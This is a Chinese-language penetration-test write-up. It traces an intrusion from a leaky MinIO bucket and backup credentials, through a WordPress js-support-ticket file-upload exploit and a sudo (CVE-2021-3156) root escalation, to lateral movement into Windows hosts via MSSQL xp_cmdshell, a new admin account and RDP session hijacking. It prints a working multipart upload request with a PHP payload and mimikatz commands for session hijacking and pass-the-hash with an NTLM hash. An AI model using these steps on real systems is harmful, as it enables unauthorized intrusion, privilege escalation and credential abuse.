0x01 背景

之前常見用rce、文件上傳等漏洞獲取webshell，偶然遇到一次敏感信息泄露獲取權限的滲透，簡單記錄一下過程。

0x02 信息泄露

發現系統某端口部署了minio服務，經過探測發現存在minio存儲桶遍歷

使用利用工具把泄露的文件全部整理一下

把文件分類整理后發現 /backup.zip 文件。下載后解壓，發現 config.php 文件，其中包含數據庫連接信息：

DB_USER=admin ?
DB_PASS=1qa@xxx135（xxx為公司簡稱首字母大寫）
DB_HOST=127.0.0.1 ?

本地數據庫地址可能有用，先放一放留著，繼續進行信息收集。 繼續探測發現其他端口發現有個web系統部署了WordPress，其中使用了一套開源票務插件js-support-ticket，存在文件上傳漏洞可利用。

POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:?
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0?----------767099171
Content-Disposition: form-data; name="action"configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png<?php?echo?md5(123);unlink(__FILE__);?>
----------767099171--?

鏈接webshell獲取 www-data 權限

查看系統版本

uname -a
Linux ubuntu-bionic 4.15.0-50-generic?#54-Ubuntu SMP Mon May 15 15:20:34 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

目標服務器是Ubuntu 18.04，嘗試CVE-2021-3156用于sudo提權。上傳并執行獲取root權限。

https://github.com/blasty/CVE-2021-3156

利用之前泄露的數據庫憑據，成功連接mysql

mysql -h 127.0.0.1 -u root -p -P 3306

查詢wp_users表，發現多個md5加密的密碼，嘗試破解發現其中一個管理員密碼可以成功解密，但是嘗試用來登錄SSH則失敗。 按照正常思路找幾臺內網主機做一下權限維持比較好，尤其是Windows機器用起來更方便，使用Tscan收集內網信息橫向移動，存活多臺Windows內網主機，但沒有發現明顯可利用的漏洞。 回顧剛才的數據庫密碼發現135對應Linux主機內網地址，那么根據已有的Windows主機ip地址推測密碼規律，嘗試登錄成功一臺Windows主機

0x03 內網橫向

內網橫向發現mssql數據庫，開xpcmdshell發現為system權限

添加管理員權限賬戶qax，3389連接獲取劫持rdp

已經開啟3389遠程桌面

REG QUERY?"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server"?/v fDenyTSConnections

遠程桌面連接rdp劫持獲取管理員權限

privilege::debug?#提權ts::sessions?#查看當前主機的會話token::elevate?#提升本地管理員權限為systemts::remote /id:1?#劫持id為1的會話或者privilege::debugsekurlsa::pth /user:9821 /domain:DESKTOP-6RVIHJ2 /ntlm:e5df2c988f0d77ef35a9bdc95b5?"/run:mstsc.exe /restrictedadmin"

成功登錄目標服務器，接下來可以用tscan獲取更多內網資產信息。至此完成了從外網滲透到內網控制的全過程。